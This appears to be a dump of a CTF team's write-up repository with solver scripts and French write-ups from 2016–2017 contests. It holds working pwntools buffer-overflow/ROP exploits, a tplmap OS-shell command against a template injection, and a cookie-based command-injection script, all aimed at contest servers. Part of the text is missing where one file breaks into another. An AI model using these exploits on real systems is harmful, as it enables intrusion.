| answer(s, str(i3)+"\n") 57 | answer(s, str(i4)+"\n") 58 | answer(s, str(i5)+"\n") 59 | answer(s, str(i6)+"\n") 60 | answer(s, str(i7)+"\n") 61 | answer(s, str(i8)+"\n") 62 | answer(s, str(i9)+"\n") 63 | answer(s, str(i10)+"\n") 64 | answer(s, str(i11)+"\n") 65 | answer(s, str(i12)+"\n") 66 | answer(s, str(i13)+"\n") 67 | answer(s, str(i14)+"\n") 68 | s.send(str(i15)+"\n") 69 | 70 | print s.recv(1024) 71 | 72 | s.close() 73 | 74 | -------------------------------------------------------------------------------- /2016/csaw2016/misc/coinslot/readme.md: -------------------------------------------------------------------------------- 1 | # Coinslot 2 | 3 | In this challenge, the goal was to give the correct amount of each kind of piece : 4 | 5 | - 10'000 6 | - 5'000 7 | - 1'000 8 | - 500 9 | - 100 10 | - 50 11 | - 20 12 | - 10 13 | - 5 14 | - 1 15 | - 0.5 16 | - 0.25 17 | - 0.10 18 | - 0.05 19 | - 0.01 20 | 21 | Since python calculation with float sux so much, I multiplied by 100. 22 | 23 | You had to connect to a port, and give the good amount of each, 400 times in a row and received a "correct" message 24 | 25 | After this, flag was shown. Hopefully I catched this message and didn't need to launch the full test again. 26 | 27 | 28 | -------------------------------------------------------------------------------- /2016/csaw2016/misc/regexpire/readme.md: -------------------------------------------------------------------------------- 1 | # Regexpire 2 | 3 | For this challenge, you had a limited time to match a string to a random regexp. 4 | 5 | The script works as a kind of regexp parser and tries to make it work. 6 | 7 | Badfully, not enough time was left and I didn't manage to correct the script. 8 | 9 | 10 | This example of script can help you build another parser for any string. 11 | -------------------------------------------------------------------------------- /2016/csaw2016/misc/regexpire/regexpire.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import socket 4 | import re 5 | 6 | def answer(s, data="0\n"): 7 | s.send(data) 8 | s.recv(1000) 9 | 10 | TCP_IP = 'misc.chal.csaw.io' 11 | TCP_PORT = 8001 12 | BUFFER_SIZE = 1024 13 | 14 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 15 | s.connect((TCP_IP, TCP_PORT)) 16 | text = s.recv(BUFFER_SIZE) 17 | while 1: 18 | text1 = s.recv(BUFFER_SIZE) 19 | print text1 20 | i=0 21 | answer = "" 22 | last = "" 23 | while i < len(text1): 24 | c = text1[i] 25 | if c == "(": 26 | last = "" 27 | i += 1 28 | nextC = text1[i] 29 | add = 1 30 | while nextC != ")": 31 | if nextC == "|": 32 | add = 0 33 | if add == 1: 34 | last += nextC 35 | i += 1 36 | nextC = text1[i] 37 | answer += last 38 | elif c == "[": 39 | lastC = text1[i] 40 | i+=1 41 | nextC = text1[i] 42 | while nextC != "]": 43 | lastC = text1[i] 44 | last = lastC 45 | i+=1 46 | nextC = text1[i] 47 | answer += last 48 | elif c == "{": 49 | cnt = "" 50 | i += 1 51 | nextC = text1[i] 52 | while nextC != "}": 53 | nextC = text1[i] 54 | cnt += nextC 55 | i += 1 56 | answer += last * (int(cnt[:-1])-1) 57 | elif c == "+": 58 | print "nothing" 59 | elif c == "*": 60 | print "nothing" 61 | elif c == "\\": 62 | i += 1 63 | nextC = text1[i] 64 | if nextC == "d": 65 | last = "1" 66 | if nextC == "w": 67 | last = "a" 68 | answer += last 69 | else: 70 | last = c 71 | answer += last 72 | 73 | i = i+1 74 | print answer 75 | s.send(answer+"\n") 76 | 77 | 78 | 79 | s.close() 80 | 81 | -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/dumpjeu.help: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/dumpjeu.help -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/hungman: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/hungman -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/hungman.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/hungman.i64 -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/jeu.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/jeu.bin -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/lance: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat tcp-listen:8003,fork,reuseaddr exec:./hungman -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Hungman/libc-2.23.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Hungman/libc-2.23.so -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2: -------------------------------------------------------------------------------- 1 | NC2='nc pwn.chal.csaw.io 8002' -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/NC2.tgz -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/NC2l: -------------------------------------------------------------------------------- 1 | NC2='nc localhost 8002' -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/libc-2.19.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/libc-2.19.so -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial.i64 -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/tutorial2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2016/csaw2016/pwn/Tutorial/tutorial2 -------------------------------------------------------------------------------- /2016/csaw2016/pwn/Tutorial/what: -------------------------------------------------------------------------------- 1 | 7feb6e3c0000 -> 2 | 7feb6e42b490 (6b) 3 | 4 | 7f8e0486c000 -> 5 | 7f8e048d7490 (6b) 6 | 7 | 7f34a2134000-> 8 | 7f34a219f490 (6b) 9 | 10 | -------------------------------------------------------------------------------- /2016/csaw2016/web/mfw/index.php: -------------------------------------------------------------------------------- 1 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | My PHP Website 26 | 27 | 28 | 29 | 30 | 51 | 52 |
53 | 56 | 57 |
58 | 59 | 17 | ``` 18 | 19 | Aucun formulaire de contact donc nous passons à autre chose. 20 | 21 | Si nous appelons une page qui n'existe pas, le site nous retourne comme information qu'il est développé avec flask. 22 | 23 | On tente : 24 | 25 | ``` 26 | http://mrpresident.sthack.fr/banish?name=Ryan{{7*7}} 27 | ``` 28 | 29 | Nous obtenons comme retour : Ryan49 30 | 31 | Nous avons donc une template injection. 32 | 33 | On récupère un shell avec [TPLMAP](https://github.com/epinna/tplmap) : 34 | 35 | ```BASH 36 | ./tplmap.py --os-shell -u 'http://mrpresident.sthack.fr/banish?name=Ryan' 37 | ``` 38 | 39 | On cherche le flag : 40 | 41 | 42 | ```BASH 43 | posix-linux2 $ ls -lash /flag/is/here 44 | total 28 45 | 4 drwxr-xr-x 1 root root 4.0K Apr 5 12:35 . 46 | 4 drwxr-xr-x 1 root root 4.0K Apr 5 12:35 .. 47 | 4 -r-------- 1 root root 17 Mar 4 23:09 flag 48 | 4 -rw-r--r-- 1 root root 198 Mar 4 23:13 getflag.c 49 | 12 -rwsr-xr-x 1 root root 10.5K Apr 5 12:35 runme 50 | ``` 51 | 52 | On affiche le flag : 53 | 54 | ```BASH 55 | posix-linux2 $ cd /flag/is/here/;./runme 56 | Y0u_G0t_TrUmp3d! 57 | ``` 58 | 59 | 60 | 61 | By team Beers4Flags 62 | 63 | 64 | ``` 65 | ________ 66 | | | 67 | | #BFF | 68 | |________| 69 | _.._,_|,_ 70 | ( | ) 71 | ]~,"-.-~~[ 72 | .=] Beers ([ 73 | | ]) 4 ([ 74 | '=]) Flags [ 75 | |:: ' | 76 | ~~----~~ 77 | ``` -------------------------------------------------------------------------------- /2017/thcon/crypto/OTPunched/img/card1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/OTPunched/img/card1.png -------------------------------------------------------------------------------- /2017/thcon/crypto/OTPunched/img/card2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/OTPunched/img/card2.png -------------------------------------------------------------------------------- /2017/thcon/crypto/OTPunched/readme.md: -------------------------------------------------------------------------------- 1 | **Crypto - OTPunched - 50pts** 2 | 3 | 4 | ![Alt](img/card1.png "Punched Card 1") 5 | 6 | ![Alt](img/card2.png "Punched Card 2") 7 | 8 | 9 | Nous avions à disposition deux cartes perforés de chez IBM. 10 | 11 | 12 | Pour récupérer les données contenu de dans , nous les avons uploader sur ce site : 13 | 14 | http://www.masswerk.at/cardreader/ 15 | 16 | On obtient deux chaines en hexa : 17 | 18 | 19 | Carte 1 = 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A 20 | 21 | Carte 2 = 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A 22 | 23 | L'OTP du titre nous fait penser à un masque jetable. Celui-ci aurait été utilisé pour chiffré les deux plaintext. 24 | 25 | https://github.com/SpiderLabs/cribdrag 26 | 27 | Nous utilisons le script xorstrings.py de l'outil cribdrag pour xorer les deux chaines. 28 | 29 | ```BASH 30 | ./xorstrings.py 365C997610306888C3CB07B26C7ED39325E4AD1BDC87255B8F5E54B66E253759B306A9BAA01B7D4A 5A04DC351E3D7B9CC3CE1DFF5142B08B3AFCA60B9484336B961F54A67319304E8845ABA9B60C734A 31 | 32 | => 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00 33 | ``` 34 | 35 | Nous utilisons ensuite la technique du crib sur cette chaine. 36 | 37 | ```BASH 38 | 39 | ./cribdrag.py 6c5845430e0d131400051a4d3d3c63181f180b1048031630194100101d3c07173b43021316170e00 40 | 41 | 42 | Your message is currently: 43 | 0 ________________________________________ 44 | Your key is currently: 45 | 0 ________________________________________ 46 | Please enter your crib: punched cards 47 | 0: "-+ fhw4cdh)N" 48 | 1: "(0-mevp f{?YO" 49 | 2: "56`n{qd%y,OX" 50 | 3: "3{cp|ea:.\Nk" 51 | ... 52 | 26: "pes_or_cards}" 53 | 27: "`hRd^'"pwejs" 54 | Enter the correct position, 'none' for no match, or 'end' to quit: 26 55 | 56 | Is this crib part of the message or key? Please enter 'message' or 'key': message 57 | Your message is currently: 58 | 0 __________________________punched cards_ 59 | Your key is currently: 60 | 0 __________________________pes_or_cards}_ 61 | 62 | ``` 63 | 64 | On continu ainsi en testant des mots potentiel jusqu'à obtenir le flag. 65 | 66 | thcon{punched_tapes_or_cards} 67 | 68 | 69 | By team Beers4Flags 70 | 71 | 72 | ``` 73 | ________ 74 | | | 75 | | #BFF | 76 | |________| 77 | _.._,_|,_ 78 | ( | ) 79 | ]~,"-.-~~[ 80 | .=] Beers ([ 81 | | ]) 4 ([ 82 | '=]) Flags [ 83 | |:: ' | 84 | ~~----~~ 85 | ``` 86 | -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/file/a.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/a.pdf -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/file/b.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/b.pdf -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/file/shattered-1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/shattered-1.pdf -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/file/shattered-2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/file/shattered-2.pdf -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/img/right.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/img/right.jpg -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/img/top.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/crypto/brokenhash/img/top.jpg -------------------------------------------------------------------------------- /2017/thcon/crypto/brokenhash/readme.md: -------------------------------------------------------------------------------- 1 | **Crypto - brokenhash - 100pts** 2 | 3 | 4 | Le challenge était sur un site web. 5 | Celui-ci nous proposait d'uploader deux fichiers. 6 | 7 | Nous créons deux fichiers vide : 8 | 9 | ```BASH 10 | touch t.txt 11 | touch t2.txt 12 | ``` 13 | 14 | Le site nous redirige sur une page contenant l'information suivante : 15 | 16 | ```BASH 17 | if sha1[0] == sha1[1] and md5[0] != md5[1]: get flag # ;) 18 | ``` 19 | 20 | Nous avons donc ici une collision sha 1 qui colle pafaitement avec l'actualité du moment. 21 | 22 | Notre premier essaye à été d'uploader les deux pdf fournit dans les recherches de collision SHA1 de Google. Ils ont la particularité d'avoir la même somme sha1. 23 | 24 | [Fichier 1 : Collision SHA1 par google ](../100/file/shattered-1.pdf) 25 | 26 | [Fichier 2 : Collision SHA1 par google ](../100/file/shattered-1.pdf) 27 | 28 | 29 | Retour du site de challenge => Too Easy. 30 | 31 | Nous avons utilisé ce site https://alf.nu/SHA1 pour construire notre collision. 32 | 33 | Les prérequis sont deux jpg < 64Ko 34 | 35 | ![Alt](img/right.jpg "Image 1") 36 | 37 | ![Alt](img/top.jpg "Image 2") 38 | 39 | Le site nous renvoie deux pdf : 40 | 41 | [Fichier 1 : Collision SHA1 par Beers4Flags ](../100/file/a.pdf) 42 | 43 | [Fichier 2 : Collision SHA1 par Beers4Flags ](../100/file/b.pdf) 44 | 45 | Nous verifions que nos deux pdf ont bien la même somme SHA1 46 | 47 | ```BASH 48 | sha1sum a.pdf 49 | 9895a12be3429d4ca69835aad36527664ed952e5 a.pdf 50 | 51 | sha1sum b.pdf 52 | 9895a12be3429d4ca69835aad36527664ed952e5 b.pdf 53 | 54 | ``` 55 | 56 | Nous les uplodons sur le site et flag ! 57 | 58 | 59 | 60 | THCon{ST0P_US1nG_Th0S3_l4m3_H4SH_FuNCTIONz} 61 | 62 | 63 | By team Beers4Flags 64 | 65 | 66 | ``` 67 | ________ 68 | | | 69 | | #BFF | 70 | |________| 71 | _.._,_|,_ 72 | ( | ) 73 | ]~,"-.-~~[ 74 | .=] Beers ([ 75 | | ]) 4 ([ 76 | '=]) Flags [ 77 | |:: ' | 78 | ~~----~~ 79 | ``` 80 | -------------------------------------------------------------------------------- /2017/thcon/web/Multipass/img/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/web/Multipass/img/flag.png -------------------------------------------------------------------------------- /2017/thcon/web/Multipass/img/web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/thcon/web/Multipass/img/web.png -------------------------------------------------------------------------------- /2017/tuctf/crypto/crypto50.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | from pwn import * 3 | p=remote('neverending.tuctf.com' ,12345) 4 | 5 | print p.recvuntil("text:") 6 | 7 | while(1): 8 | p.sendline("ABCDEF") 9 | b= p.recvuntil("?\n:") 10 | print b 11 | b=b[b.index("encrypted is ")+len("encrypted is "):] 12 | print "ABCDEF","->",b 13 | delta=ord(b[0])-ord("A") 14 | b=b[b.index("What is ")+len("What is "):] 15 | b=b[:b.index(" decrypted?")] 16 | c="" 17 | for i in b: 18 | c=c+chr((ord(i)-delta-32+95) % 95+32) 19 | print "-->",c 20 | p.sendline(c) 21 | print p.recv(1000) 22 | 23 | 24 | print p.recvuntil("text:") 25 | p.sendline("ABCDEF") 26 | b= p.recvuntil("?\n:") 27 | print b 28 | b=b[b.index("encrypted is ")+len("encrypted is "):] 29 | 30 | print "ABCDEF","->",b 31 | delta=ord(b[0])-ord("A") 32 | b=b[b.index("What is ")+len("What is "):] 33 | b=b[:b.index(" decrypted?")] 34 | c="" 35 | for i in b: 36 | c=c+chr((ord(i)-delta-32+95) % 95+32) 37 | print "-->",c 38 | p.sendline(c) 39 | 40 | print p.recvall(1) 41 | exit(0) 42 | -------------------------------------------------------------------------------- /2017/tuctf/pwn/vuln-chat/payload-final.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | from pwn import * 4 | context.clear(arch='i386') 5 | 6 | import time 7 | import sys 8 | binaire='vuln-chat' 9 | 10 | if (len(sys.argv)>1): 11 | TIME=0.0 12 | elf=ELF(binaire) 13 | libc=ELF('/opt/libc-database-master/db/libc6-i386_2.19-18+deb8u2_amd64.so') 14 | host='vulnchat.tuctf.com' 15 | port=4141 16 | 17 | else: 18 | TIME=0.0 19 | elf=ELF(binaire) 20 | libc=ELF('libc.so.6') 21 | host='localhost' 22 | port=59994 23 | 24 | 25 | p=remote(host,port) 26 | 27 | p.recvuntil("name: ") 28 | p.sendline("ABCDEFGHIJKLMNOPQRST%s") 29 | p.recvuntil("%s: ") 30 | pop1=0x080483c1 # : pop ebx ; ret 31 | PAD="ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFFGGHHI" 32 | 33 | pile=p32(0x804b580)+p32(elf.sym['printFlag'])+p32(pop1)+p32(elf.got['fflush'])+p32(pop1)+p32(elf.sym['stdout']) 34 | p.sendline(PAD+pile) 35 | print p.recvall(2) 36 | exit(0) 37 | -------------------------------------------------------------------------------- /2017/tuctf/pwn/vuln-chat2/payload-final.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # encoding: utf-8 3 | from pwn import * 4 | context.clear(arch='i386') 5 | 6 | import time 7 | import sys 8 | binaire='vuln-chat2.0' 9 | 10 | if (len(sys.argv)>1): 11 | TIME=0.0 12 | elf=ELF(binaire) 13 | libc=ELF('/opt/libc-database-master/db/libc6-i386_2.19-18+deb8u2_amd64.so') 14 | host='vulnchat2.tuctf.com' 15 | port=4242 16 | 17 | else: 18 | TIME=0.0 19 | elf=ELF(binaire) 20 | # libc=ELF('libc.so.6') 21 | host='localhost' 22 | port=59993 23 | 24 | p=remote(host,port) 25 | 26 | print p.recvuntil("name: ") 27 | p.sendline("ABCDEFGHIJKLMNO") 28 | print p.recvuntil("O: ") 29 | pop1=0x080483c1 # : pop ebx ; ret 30 | PAD="ABCDEFGHIJKLMNOPQRSTUVWXYZ@@AABBCCDDEEFabcd" 31 | pile="\x72\x86" 32 | p.sendline(PAD+pile) 33 | time.sleep(4) 34 | print p.recvall(10) 35 | 36 | exit(0) 37 | -------------------------------------------------------------------------------- /2017/tuctf/web/web200/solution: -------------------------------------------------------------------------------- 1 | Le script a débuté sur dim. 26 nov. 2017 14:44:49 CET 2 | ]0;francois@aramis: /tmpfrancois@aramis:/tmp$ sh test.sh ' 3 | > 4 | > ls 5 | > ' 6 | 7 | 8 | ls 9 | 10 | 11 |

12 | There's no way you can steal the flag from Woody Harrelson's Cookies!! 13 | flag1337 14 | images 15 | index.php 16 | index.txt 17 | # Netscape HTTP Cookie File 18 | # http://curl.haxx.se/docs/http-cookies.html 19 | # This file was generated by libcurl! Edit at your own risk. 20 | 21 | cookieharrelson.tuctf.com FALSE / FALSE 1514295906 tallahassee Y2F0IGluZGV4LnR4dCAjCgpscyAgICAgICAgICAKCg%3D%3D 22 | cat index.txt # 23 | 24 | ls 25 | 26 | ]0;francois@aramis: /tmpfrancois@aramis:/tmp$ sh test.sh ' 27 | > 28 | > cat flag1337 29 | > ' 30 | test.sh: 2: [: cat: unexpected operator 31 | 32 | 33 | cat flag1337 34 | 35 | 36 |

37 | There's no way you can steal the flag from Woody Harrelson's Cookies!! 38 | Flag: TUCTF{D0nt_3x3cut3_Fr0m_C00k13s} 39 | # Netscape HTTP Cookie File 40 | # http://curl.haxx.se/docs/http-cookies.html 41 | # This file was generated by libcurl! Edit at your own risk. 42 | 43 | cookieharrelson.tuctf.com FALSE / FALSE 1514295914 tallahassee Y2F0IGluZGV4LnR4dCAjCgpjYXQgZmxhZzEzMzcKCg%3D%3D 44 | cat index.txt # 45 | 46 | cat flag1337 47 | 48 | ]0;francois@aramis: /tmpfrancois@aramis:/tmp$ exit 49 | 50 | Script terminé sur dim. 26 nov. 2017 14:45:20 CET 51 | -------------------------------------------------------------------------------- /2017/tuctf/web/web200/test.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | if [ -z $1 ] ; then 3 | COK=$(echo "\" ; ls" | base64) 4 | else 5 | COK=$(echo "$*" | base64) 6 | fi 7 | echo $COK | base64 -d 8 | rm cok 9 | curl http://cookieharrelson.tuctf.com/ -b tallahassee=${COK} -c cok 10 | cat cok 11 | tail -n 1 cok | awk '{print $7}' | sed -e '1,$s/%3D/=/g' | base64 -d 12 | -------------------------------------------------------------------------------- /2017/xiomara/pwn/README.md: -------------------------------------------------------------------------------- 1 | * mint est un pwn reposant sur un buffer overflow. Celui ci s'obtient en créant un texte puis en luis rajoutant un deuxième texte. Il est alors possible d'écraser le retour de main_proc. Le principe ici est de faire un premier ROP affichant la valeur GOT de puts, puis de reboucler en 0x080483dd. À cet instant, connaissant l'adresse libc de puts, on est en mesure de faire un system(/bin/sh). 2 | 3 | * xor_tool semble présenter deux failles dans la fonction decrypt, un BOF de 4 octets via read(0, s, 0x36u) où s est un buffer de 50 octets, et une faille format via un printf direct du texte déchiffré. 4 | payloadformat.py exploite cette deuxième faille de la façon suivante: 5 | - affichage de la pile 6 | - affichage de la valeur GOT de printf 7 | - Ecrasement du retour de decrypt vers system(/bin/sh), l'écriture de la pile se fait en bouclant sur la fonction decrypt en modifiant à chaque fois l'adresse de retour (0x8048907) en 0x8048902. 8 | 9 | 10 | François 11 | -------------------------------------------------------------------------------- /2017/xiomara/pwn/secure_pyshell/pwn2.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | import sys, cmd, os 3 | 4 | del __builtins__.__dict__['__import__'] 5 | del __builtins__.__dict__['eval'] 6 | 7 | intro = """ 8 | Welcome to Secure Python Interpreter 9 | ================================================ 10 | 11 | Rules: 12 | -Do not import anything 13 | -No peeking at files! 14 | -No sharing of flags :) 15 | 16 | """ 17 | 18 | 19 | def execute(command): 20 | exec(command, globals()) 21 | 22 | class Jail(cmd.Cmd): 23 | 24 | prompt = '>>> ' 25 | filtered = '\'|.|input|if|else|eval|exit|import|quit|exec|code|const|vars|str|chr|ord|local|global|join|format|replace|translate|try|except|with|content|frame|back'.split('|') 26 | 27 | def do_EOF(self, line): 28 | sys.exit() 29 | 30 | def emptyline(self): 31 | return cmd.Cmd.emptyline(self) 32 | 33 | def default(self, line): 34 | sys.stdout.write('\x00') 35 | 36 | def postcmd(self, stop, line): 37 | if any(f in line for f in self.filtered): 38 | print("Do you think my code is so insecure ?") 39 | print("You can never get out of my jail :)") 40 | else: 41 | try: 42 | execute(line) 43 | except NameError: 44 | print("NameError: name '%s' is not defined" % line) 45 | except Exception: 46 | print("Error: %s" % line) 47 | return cmd.Cmd.postcmd(self, stop, line) 48 | 49 | if __name__ == "__main__": 50 | try: 51 | Jail().cmdloop(intro) 52 | except KeyboardInterrupt: 53 | print("\rBye bye !") 54 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/diffie_hellman/img/crypto.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Beers4Flags/writeups/de7b3b960ab0029ddb849370717f7edb7cb813f4/2017/yubitsec/crypto/diffie_hellman/img/crypto.jpg -------------------------------------------------------------------------------- /2017/yubitsec/crypto/diffie_hellman/readme.md: -------------------------------------------------------------------------------- 1 | **Diffie Hellman - Crypto - 225** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Just find a and b 7 | 8 | Note: Flag format will be YUBITSEC{a,b} 9 | 10 | ``` 11 | ![Alt](img/crypto.jpg "crypto") 12 | 13 | __Résolution :__ 14 | 15 | On a comme information sur l'image : 16 | ``` 17 | q=1357 18 | g=10 19 | 20 | g^a mod q = 419 21 | g^b mod q = 34 22 | g^ab mod q = 33 23 | 24 | a < 1000 25 | b < 1000 26 | ``` 27 | Avec Sagemath on résout l'équation : 28 | 29 | ``` 30 | 31 | sage: for a in range(1000): 32 | ....: if int(pow(g,a)%q)==419: 33 | ....: print "trouver :"+str(a) 34 | ....: 35 | ....: 36 | trouver :521 37 | 38 | sage: for b in range(1000): 39 | ....: if int(pow(g,b)%q)==34: 40 | ....: print "trouver :"+str(b) 41 | ....: 42 | ....: 43 | ....: 44 | trouver :619 45 | ``` 46 | 47 | flag : YUBITSEC{521,619} 48 | 49 | 50 | By team Beers4Flags 51 | 52 | 53 | ``` 54 | ________ 55 | | | 56 | | #BFF | 57 | |________| 58 | _.._,_|,_ 59 | ( | ) 60 | ]~,"-.-~~[ 61 | .=] Beers ([ 62 | | ]) 4 ([ 63 | '=]) Flags [ 64 | |:: ' | 65 | ~~----~~ 66 | ``` 67 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/easy/readme.md: -------------------------------------------------------------------------------- 1 | **Easy - Crypto - 100** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Seems like there must be hiding flag, find it! 7 | ``` 8 | [Sources](src/) 9 | 10 | __Résolution :__ 11 | 12 | On a une liste de hash md5, on les déchiffre grâce à [hashkiller](https://hashkiller.co.uk/md5-decrypter.aspx) 13 | 14 | ``` 15 | MD5?_Hell_Yes!_So_you_know_what_do_you[...] 16 | 17 | 18 | YUBITSEC{I_h0p3_y0u_didn't_try_t0_d3crpyt_on3_by_on3} 19 | 20 | 21 | maybe_flag_can_be_little_bit_upI_think_flag_won't_be_ending_part 22 | ``` 23 | 24 | 25 | By team Beers4Flags 26 | 27 | 28 | ``` 29 | ________ 30 | | | 31 | | #BFF | 32 | |________| 33 | _.._,_|,_ 34 | ( | ) 35 | ]~,"-.-~~[ 36 | .=] Beers ([ 37 | | ]) 4 ([ 38 | '=]) Flags [ 39 | |:: ' | 40 | ~~----~~ 41 | ``` 42 | -------------------------------------------------------------------------------- /2017/yubitsec/crypto/rsa/readme.md: -------------------------------------------------------------------------------- 1 | **RSA 1 - Crypto - 325** 2 | 3 | Enoncé : 4 | 5 | ``` 6 | Can you decrypt these ciphertexts ? 7 | ``` 8 | [Sources](src/) 9 | 10 | __Résolution :__ 11 | 12 | Même chose pour les 3 clés : 13 | 14 | On récupère les informations contenues dans la clé publique : 15 | ```BASH 16 | openssl rsa -in pubkey.pem -pubin -text -modulus 17 | ``` 18 | 19 | On remarque que le modulo est faible : 20 | 21 | ``` 22 | Public-Key: (149 bit) 23 | Modulus: 24 | 1a:ac:d3:c9:0d:1a:bd:fd:dd:de:18:35:f5:8a:88: 25 | f0:36:8b:9f 26 | Exponent: 65537 (0x10001) 27 | Modulus=1AACD3C90D1ABDFDDDDE1835F58A88F0368B9F 28 | -----BEGIN PUBLIC KEY----- 29 | MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITGqzTyQ0avf3d3hg19YqI8DaLnwIDAQAB 30 | -----END PUBLIC KEY----- 31 | Public-Key: (154 bit) 32 | Modulus: 33 | 03:8a:f3:1e:59:8e:24:2b:5f:cf:1b:30:6f:df:f0: 34 | e2:d6:6e:f2:39 35 | Exponent: 65537 (0x10001) 36 | Modulus=38AF31E598E242B5FCF1B306FDFF0E2D66EF239 37 | -----BEGIN PUBLIC KEY----- 38 | MC8wDQYJKoZIhvcNAQEBBQADHgAwGwIUA4rzHlmOJCtfzxswb9/w4tZu8jkCAwEA 39 | AQ== 40 | -----END PUBLIC KEY----- 41 | Public-Key: (151 bit) 42 | Modulus: 43 | 65:7a:90:84:26:10:1a:fa:25:51:cf:ca:26:e3:9a: 44 | f5:64:53:27 45 | Exponent: 65537 (0x10001) 46 | Modulus=657A908426101AFA2551CFCA26E39AF5645327 47 | -----BEGIN PUBLIC KEY----- 48 | MC4wDQYJKoZIhvcNAQEBBQADHQAwGgITZXqQhCYQGvolUc/KJuOa9WRTJwIDAQAB 49 | -----END PUBLIC KEY----- 50 | ``` 51 | On passe le modulo de hexa à int est on le factorise : 52 | ```PYTHON 53 | sage : 